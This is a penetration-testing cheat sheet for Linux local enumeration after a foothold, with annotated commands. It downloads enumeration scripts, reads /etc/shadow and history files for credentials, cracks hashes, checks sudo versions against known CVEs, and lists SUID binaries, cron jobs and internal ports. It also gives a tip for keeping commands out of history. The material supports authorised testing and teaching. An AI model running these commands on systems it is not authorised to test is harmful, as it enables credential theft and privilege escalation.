# Linux Enumeration
This page collects the manual and automated local-enumeration steps you would run on a Linux host after getting a foothold during a pentest, to find a path to higher privileges or to useful data.
## Auto - Recon
### linpeas.sh
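# "-O" (capital) tells curl to keep the remote file name and treats "linpeas.sh" as a second URL;
# "-o" names the output file. -f fails on HTTP errors, -L follows redirects (the upstream project has
# since been renamed PEASS-ng and the old path may redirect - confirm the URL before relying on it).
# chmod only runs if the download succeeded. Review any script you fetch before running it; on a real
# engagement stage it from your own host rather than pulling it from GitHub on the target.
curl -fsSL https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh -o linpeas.sh && chmod 700 linpeas.sh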
### LSE (linux-smart-enumeration)
# -O sets the local file name; mode 700 keeps the script executable by you only.
wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh
### LinEnum
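# The original used "-0" (digit zero), which wget rejects; the output-name option is "-O" (capital o).
# chmod only runs if the download succeeded.
wget "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh" -O linenum.sh && chmod 700 linenum.sh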
### Enum4linux
# Remote SMB/Samba enumeration (-a = all basic checks). Unlike the scripts above this runs from the
# attacking host against <IP>, not on the compromised machine.
enum4linux -a <IP>
### Linux Exploit Suggester
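# Same download pattern as the other tools (the original forgot the chmod). LES matches the kernel
# version against a list of known exploits; every candidate it reports still needs manual verification.
wget "https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh" -O les.sh && chmod 700 les.sh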
## Manual - Recon
### Users
Enumerate the users and groups on the system and decide which account is your next target (a service account, a member of a privileged group, or root itself).
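whoami                                  # current user
id                                      # uid/gid and group memberships (the page had "ld", which is the linker)
cat /etc/passwd                         # all accounts; a real shell (not nologin/false) means an interactive user
awk -F: '$3 == 0' /etc/passwd           # any extra uid-0 account is a root alias
cat /etc/group                          # memberships in sudo/wheel/docker/disk/lxd etc. are worth noting
ls -al /etc/shadow                      # is it readable? world-readable shadow = hashes for free
cat /etc/shadow 2>/dev/null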
- If you get a hash somewhere --> JohnTheRipper or Hashcat. For shadow hashes, combine the files first (`unshadow /etc/passwd /etc/shadow > hashes.txt`) so the cracker also gets the usernames.
### History
Shell and tool history files often contain credentials and secrets typed on the command line (passwords passed as arguments, connection strings, tokens). It's always worth a look.
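cat ~/.bash_history
# Other shells and clients keep their own history files
cat ~/.zsh_history ~/.mysql_history ~/.python_history ~/.psql_history 2>/dev/null
# History files of other users that you happen to be able to read
find / -name "*_history" -readable 2>/dev/null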
**Pro Tip**
If you don't want a sensitive command saved in your own history file, prefix it with a space. This only works when `HISTCONTROL` contains `ignorespace` or `ignoreboth` (the default on many distributions, but not all); `unset HISTFILE` for the session is the more reliable option.
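# Prefix the command with a single space (shown below) so bash skips it when HISTCONTROL contains
# ignorespace/ignoreboth. Note the original wrote "export $PASSWORD=..." - the "$" expands the (empty)
# variable first, so bash sees "export =p4ssw0rd" and fails with "not a valid identifier".
 export PASSWORD=p4ssw0rd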
### Sudo Version & Rights
Always record the exact sudo version: several releases have well-known local privilege-escalation bugs that give easy root, so compare the version against the advisories rather than trusting a single regex.
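# Exact version first, then a heuristic match. The widely copied one-liner ended its 1.8.1x branch
# with "\*", which grep's BRE reads as a literal asterisk, so that branch never matched anything;
# fixed here. It flags 1.0-1.7.x and 1.8.10-1.8.27, i.e. versions below 1.8.28 (CVE-2019-14287,
# the "sudo -u#-1" bug). It does NOT cover 1.8.0-1.8.9, nor the CVE-2021-3156 ("Baron Samedit")
# range 1.8.2-1.8.31p2 / 1.9.0-1.9.5p1 - check those against the version printed by the first line.
sudo -V 2>/dev/null | head -n 1
sudo -V 2>/dev/null | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\|1\.8\.2[01234567]"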
Also list the sudo rules that apply to your current user; a rule allowing any binary as root, or one of the binaries listed on GTFOBins, is usually enough to elevate.
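sudo -l                 # may prompt for the current user's password
sudo -n -l 2>&1         # non-interactive: never prompts, so it cannot hang a reverse shell; shows NOPASSWD rules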
If the user has `(ALL) NOPASSWD: ALL` in sudoers, go straight to root; if the rule is scoped to another user, e.g. `(admin) NOPASSWD: ALL`, become that user instead.
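# Rule "(ALL) NOPASSWD: ALL" -> a root login shell
sudo -i
# Rule scoped to a specific user, e.g. "(admin) NOPASSWD: ALL" -> a shell as that user
sudo -u admin bash -i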
### SUID
Look for setuid/setgid binaries: they run with their owner's (often root's) privileges, so a misconfigured, custom or known-abusable one (see GTFOBins) is a direct privesc path. File capabilities are the modern equivalent and are easy to forget.
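# setuid or setgid files with full listing (the original ended in a truncated "2> /dev/")
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
# setuid only
find / -perm -u=s -type f 2>/dev/null
# setuid and owned by root - the interesting ones
find / -perm -4000 -user root 2>/dev/null
# setgid only (a writable group-owned target is abusable too)
find / -perm -2000 -type f 2>/dev/null
# file capabilities, e.g. cap_setuid on an interpreter
getcap -r / 2>/dev/null
# for a suspicious binary: which shared libraries does it load, and from where? A library resolved
# from a directory you can write to can be replaced. (The original fused this line with the one above.)
ldd /usr/bin/binary-name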
### SUID Suspect
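# Trace which files and libraries the binary tries to open; a lookup that fails ("No such file") in a
# directory you can write to is a hijack candidate. strace writes to stderr, hence 2>&1. Note the kernel
# drops setuid while a process is traced, so this run is unprivileged - fine, we only want the lookups.
# (The original pattern had "no suchfile", which never matches the real message.)
strace /usr/local/bin/weirdbinary 2>&1 | grep -iE "open|access|no such file"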
### Linux kernel & versions
Identify the distribution and kernel version so you can search for known CVEs and kernel exploits (feed the output to linux-exploit-suggester above).
cat /etc/issue        # login banner, often names the distribution
cat /etc/*-release    # distribution and release (os-release, lsb-release, ...)
cat /proc/version     # kernel version plus the compiler/build string
uname -a              # kernel release, architecture, build date
### Applications installed
Some installed tools are useful for post-exploitation and exfiltration (network tools, interpreters, compilers, container runtimes).
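# Print the path of every tool from the list that exists; missing ones are silently skipped
which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
# Full package list: dpkg on Debian/Ubuntu, rpm on RHEL/Fedora/SUSE (the original only covered dpkg)
dpkg -l 2>/dev/null || rpm -qa 2>/dev/null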
### Compiler
You may need to compile C exploits or payloads on the target; if no compiler is available, build statically on your own machine and transfer the binary.
# Find a C compiler: package lists first (dpkg, else yum), then PATH, else the locate database.
# Runs in a subshell so the chained ||/; do not affect the calling shell.
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
### RW-files
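ls -la
# Files owned by a given user that you can read (set TARGET=<username>; defaults to yourself)
find / -type f -user "${TARGET:-$USER}" -readable 2>/dev/null
# Writable directories (the original comment said "files", but -type d lists directories)
find / -writable -type d 2>/dev/null
# Writable files, skipping the /proc noise
find / -writable -type f -not -path "/proc/*" 2>/dev/null
# Writable directories under /usr/local - these are usually on PATH
find /usr/local/ -type d -writable 2>/dev/null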
### Process list
List the running processes and their owners: this reveals cron jobs, services and scripts running as root that you may be able to influence (writable script, hijackable path, exposed socket).
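# BSD syntax: all processes with owner. The original "ps -aux" mixes BSD and SysV syntax;
# procps only tolerates it with a warning, so use the plain form.
ps aux
# SysV syntax with the parent/child tree
ps -ef --forest
# If /proc is mounted with hidepid=2 other users' processes are hidden from you
mount | grep " /proc "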
### Internal ports
Services are probably listening on the machine, either on all interfaces or only on localhost. Loopback-only services were never exposed to the network scan, so they are often less hardened and are reachable once you set up port forwarding (e.g. `ssh -L`).
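# Command names are case-sensitive: the original "Netstat" does not exist.
netstat -alnp | grep LIST | grep port_num     # is a specific port listening, and which process owns it
netstat -antp                                  # all TCP sockets with PID/program (other users' PIDs need root)
netstat -tulnp                                 # TCP and UDP listeners
ss -tulnp                                      # same with ss; netstat is often not installed anymore
# Listeners bound to loopback only - candidates to reach via port forwarding or curl from the box.
# (ss takes short options here; the original "--ntpu" is not a valid long option.)
(netstat -punta || ss -ntpu) 2>/dev/null | grep "127.0"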
### Crontab
Scheduled jobs run as root can be exploited when the script, a binary it calls, or a directory on its PATH is writable by you, or when it uses wildcards or relative paths carelessly. Check systemd timers as well - they are the other scheduler.
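ls -lah /etc/cron*                             # system jobs: /etc/crontab, cron.d/, cron.{hourly,daily,weekly,monthly}/
cat /etc/crontab                               # note the PATH line and whether any referenced file is writable
ls -la /var/spool/cron/crontabs 2>/dev/null    # per-user crontabs (normally root-only)
crontab -l 2>/dev/null                         # your own crontab
systemctl list-timers --all 2>/dev/null        # systemd timers
ls -la /var/log/cron* 2>/dev/null              # locating cron logs
find / -name cronlog 2>/dev/null
grep "CRON" /var/log/cron.log 2>/dev/null      # jobs that actually ran, from the logs
grep CRON /var/log/syslog 2>/dev/null          # same, on syslog-based distributions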
### Mounted drives
Mounted and mountable drives can contain secrets or sensitive information for your post-exploitation; `/etc/fstab` itself sometimes references credential files for network shares.
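ls -la /mnt /media 2>/dev/null   # usual mount points for USB devices and extra disks (the original "mnt" is not a command)
mount                            # everything currently mounted, with options
df -h                            # mounted filesystems and their usage
cat /etc/fstab                   # filesystems mounted at boot; look for credentials= or network shares
/bin/lsblk                       # all block devices, including unmounted partitions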
### Firewall rules
Always good to know which inbound and outbound restrictions apply on this machine before you try to call back out or pivot.
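grep -Hs iptables /etc/*                    # scripts and configs under /etc that mention iptables
ls -la /etc/iptables /etc/ufw 2>/dev/null   # persisted rule sets, if present
iptables -L -n -v 2>/dev/null               # live rules; needs root, silent otherwise
nft list ruleset 2>/dev/null                # nftables hosts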
